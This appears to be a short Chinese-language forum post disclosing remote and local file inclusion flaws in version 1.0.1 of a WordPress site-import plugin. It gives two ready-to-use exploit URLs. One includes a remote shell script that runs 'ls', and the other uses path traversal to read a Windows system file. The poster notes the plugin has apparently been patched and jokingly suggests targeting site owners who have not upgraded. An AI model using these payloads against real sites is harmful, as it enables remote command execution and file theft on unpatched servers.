Wordpress Site Import Plugin 1.0.1本地和远程文件包含漏洞
======================================
远程文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=http%3a%2f%2flocalhost%2fshell.php?shell=ls
本地文件包含 == http://localhost/wordpress/wp-content/plugins/site-import/admin/page.php?url=..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\windows\win.ini
================================= 这个漏洞还是挺有效的,不过貌似这个插件最新版本已经修补了。
不过可以去纠结一下还没有升级的站长:lol
页:
[1]